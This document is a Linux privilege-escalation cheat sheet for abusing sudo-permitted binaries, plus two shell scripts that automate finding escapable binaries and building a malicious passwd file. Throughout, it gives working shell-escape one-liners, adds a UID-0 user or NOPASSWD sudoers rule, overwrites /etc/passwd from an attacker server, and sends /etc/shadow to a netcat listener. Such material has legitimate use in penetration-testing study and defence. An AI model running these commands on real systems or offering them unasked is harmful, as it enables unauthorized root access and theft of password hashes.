Exploiting SUDO Users
To exploit a sudo user you first need to find which commands you are allowed to run with sudo, as which user, and whether a password is required:
sudo -l
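As an added example that is not part of the original page, the script below reads `sudo -l` output (a constructed sample, since no real host is involved), extracts each allowed binary, and reports which ones have a shell escape listed on this page together with the escape to use. The `trim`, `find_escapable` and `escape_hint` names are this example's own.

```shell
#!/bin/sh
# Added example, not from the original page: triage `sudo -l` output against the
# binaries this page has a shell escape for, and print the matching escape.
# The sudo -l text in SAMPLE_SUDO_L is constructed sample output, not a real host.

# Binaries with a shell escape on this page.
ESCAPABLE="find vim nmap man less more awk nano wget apache2"

# escape_hint BIN: print the escape for BIN as given on this page.
escape_hint() {
    case $1 in
        find)    printf '%s\n' "sudo find /etc/passwd -exec /bin/sh \\;" ;;
        vim)     printf '%s\n' "sudo vim -c '!sh'" ;;
        nmap)    printf '%s\n' "echo \"os.execute('/bin/sh')\" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse" ;;
        man)     printf '%s\n' "sudo man man   # then type !sh" ;;
        less)    printf '%s\n' "sudo less /etc/hosts   # then type !sh" ;;
        more)    printf '%s\n' "sudo more /etc/passwd   # file must exceed one screen, then type !sh" ;;
        awk)     printf '%s\n' "sudo awk 'BEGIN {system(\"/bin/sh\")}'" ;;
        nano)    printf '%s\n' "sudo nano /etc/sudoers   # add: user ALL=(ALL) NOPASSWD:ALL" ;;
        wget)    printf '%s\n' "sudo wget http://ATTACKER/passwd -O /etc/passwd   # serve a passwd with a UID-0 user" ;;
        apache2) printf '%s\n' "sudo apache2 -f /etc/shadow   # leaks the first line of the file" ;;
        ALL)     printf '%s\n' "any command, e.g. sudo /bin/sh" ;;
        *)       printf '%s\n' "no escape on this page" ;;
    esac
}

# trim: strip leading whitespace from $1.
trim() { printf '%s' "${1#"${1%%[![:space:]]*}"}"; }

# find_escapable: read `sudo -l` output on stdin and print one matching binary
# per line. sudo -l prints allowed commands as "(runas) [TAG:] /path/bin args",
# several per line separated by commas; a bare "ALL" means any command.
find_escapable() {
    while IFS= read -r line; do
        line=$(trim "$line")
        case $line in "("*")"*) ;; *) continue ;; esac   # only "(runas) cmd" lines
        line=${line#*')'}                                  # drop the (runas) spec
        printf '%s\n' "$line" | tr ',' '\n' | while IFS= read -r cmd; do
            cmd=$(trim "$cmd")
            case $cmd in
                NOPASSWD:*|PASSWD:*|SETENV:*|NOSETENV:*) cmd=$(trim "${cmd#*:}") ;;
            esac
            if [ "$cmd" = ALL ]; then echo ALL; continue; fi
            bin=${cmd%% *}          # first word is the binary (args follow)
            bin=${bin##*/}          # strip the directory part
            for e in $ESCAPABLE; do
                if [ "$bin" = "$e" ]; then echo "$bin"; fi
            done
        done
    done
}

# Constructed sample of `sudo -l` output (assumption: typical Debian-style layout).
SAMPLE_SUDO_L='Matching Defaults entries for user on target:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User user may run the following commands on target:
    (ALL) NOPASSWD: /usr/bin/find, /usr/bin/vim
    (root) /usr/bin/less /etc/hosts
    (root) /usr/bin/id'

# On a real host replace the printf with: sudo -l | find_escapable
printf '%s\n' "$SAMPLE_SUDO_L" | find_escapable | while IFS= read -r b; do
    printf '%-8s %s\n' "$b" "$(escape_hint "$b")"
done
```

Commands that are allowed with arguments fixed in sudoers (such as `/usr/bin/less /etc/hosts`) still count: the pager escapes work regardless of which file was named.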
Escalate privileges to root with the command that matches the binary you are allowed to run:
sudo find /etc/passwd -exec /bin/sh \;
sudo find /bin -name nano -exec /bin/sh \;
sudo vim -c '!sh'
# Old way (interactive mode, available in nmap versions 2.02 to 5.21)
sudo nmap --interactive
nmap> !sh
sh-4.1#
# Newer way (interactive mode was removed, so load an NSE script that spawns a shell instead)
echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse
sudo man man
# at the man pager prompt type !sh and press Enter
sudo less /etc/hosts
# at the less prompt type !sh and press Enter
sudo more /etc/hosts
# more only shows its prompt when the file is longer than the screen; if /etc/hosts fits on one page use a longer file such as /etc/passwd, then type !sh and press Enter
sudo awk 'BEGIN {system("/bin/sh")}'
# if nano is allowed, edit /etc/passwd or /etc/sudoers directly (see below)
sudo nano /etc/passwd
sudo nano /etc/sudoers
If you can edit /etc/passwd, append an entry for a new user with UID 0 and GID 0; UID 0 is what makes the account root. The hash field must hold a hash whose password you know (generate one with openssl passwd -6 or mkpasswd -m sha-512); the hash below is only the page's example value.
user:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash
su user
# enter the password matching the hash; the new shell runs as UID 0
If instead you can edit /etc/sudoers, add an entry for your user so it may run every command as root without being asked for a password:
user ALL=(ALL) NOPASSWD:ALL
The equivalent entry that still prompts for the user's own password is:
user ALL=(ALL:ALL) ALL
Editing sudoers with nano skips the syntax check that visudo performs; a single syntax error makes sudo refuse to run at all, so check the line carefully before saving.
- Copy the target's /etc/passwd file to the attacker machine.
- On the attacker machine, edit that copy and add a new UID-0 user to it (again, use a hash whose password you know).
- append this line only => ayed:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash
- Host the modified passwd file with any web server (for example python3 -m http.server 8080 in that directory), then on the target overwrite /etc/passwd with it using the allowed sudo wget and switch to the new user:
sudo wget http://192.168.56.1:8080/passwd -O /etc/passwd
su ayed
- Caution: wget -O truncates /etc/passwd before the download starts, so a failed download leaves the file empty and no account, root included, can log in. Confirm the URL is reachable from the target before running it.
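The attacker-side half of the procedure above, as an added example that is not part of the original page: it appends the UID-0 user to a copy of the target's passwd file and refuses to hand it over for serving unless the result still parses as a valid passwd file, because the `wget -O` step truncates the target's file before writing. The passwd content is constructed; `make_root_entry`, `validate_passwd` and `add_root_user` are this example's own names, and `openssl passwd -6` is assumed to be available (OpenSSL 1.1.1 or newer), with a non-working placeholder hash used if it is not.

```shell
#!/bin/sh
# Added example, not from the original page: build the modified passwd file for
# the sudo-wget technique on the attacker side and sanity-check it before it is
# served, because `wget -O /etc/passwd` truncates the target's file first and a
# broken upload locks every account out. The passwd content below is constructed.

# make_root_entry NAME HASH: print a passwd line giving NAME UID 0 and GID 0.
make_root_entry() {
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$1" "$2"
}

# validate_passwd FILE: succeed only if FILE is a usable passwd file: non-empty,
# every line has exactly 7 colon-separated fields and a numeric UID, no user
# name is repeated, and the root entry is still present.
validate_passwd() {
    [ -s "$1" ] || { echo "empty file: $1" >&2; return 1; }
    awk -F: '
        NF != 7          { print "line " NR ": expected 7 fields, got " NF > "/dev/stderr"; bad = 1 }
        $3 !~ /^[0-9]+$/ { print "line " NR ": non-numeric uid " $3 > "/dev/stderr"; bad = 1 }
        seen[$1]++       { print "line " NR ": duplicate user " $1 > "/dev/stderr"; bad = 1 }
        $1 == "root"     { root = 1 }
        END { if (!root) { print "root entry missing" > "/dev/stderr"; bad = 1 }
              exit bad }
    ' "$1"
}

# add_root_user COPY NAME HASH: append the UID-0 entry to COPY, then validate it.
add_root_user() {
    make_root_entry "$2" "$3" >> "$1" && validate_passwd "$1"
}

# --- demo on a constructed copy; never run this against the real /etc/passwd ---
WORK=$(mktemp -d)
cat > "$WORK/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
user:x:1000:1000:user:/home/user:/bin/bash
EOF

# Hash for a password you know. `openssl passwd -6` needs OpenSSL 1.1.1 or newer
# (assumption); the fallback is a placeholder that lets nobody log in.
HASH=$(openssl passwd -6 'Passw0rd!' 2>/dev/null || echo '$6$replaceme$generate-this-with-openssl-passwd-6')

if add_root_user "$WORK/passwd" ayed "$HASH"; then
    echo "passwd copy is valid; serve it with: (cd $WORK && python3 -m http.server 8080)"
    echo "then on the target: sudo wget http://192.168.56.1:8080/passwd -O /etc/passwd && su ayed"
fi
rm -rf "$WORK"
```

The validation deliberately keeps the original root line and every existing account intact; the goal is to add one UID-0 user, not to replace the file with a single line, which would break every service that looks up its own account.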
- Note: to dump a file from the target, such as root's SSH key or /etc/shadow, sudo wget can POST it to a listener on the attacker machine. Start the listener first, then send the file:
nc -lvp 8080
sudo wget --post-file=/etc/shadow 192.168.56.1:8080
- If apache2 is the allowed binary instead, passing a file as its configuration makes it print that file's first line inside a syntax error message. That is enough to read root's hash from /etc/shadow, but only the first line is leaked:
sudo apache2 -f /etc/shadow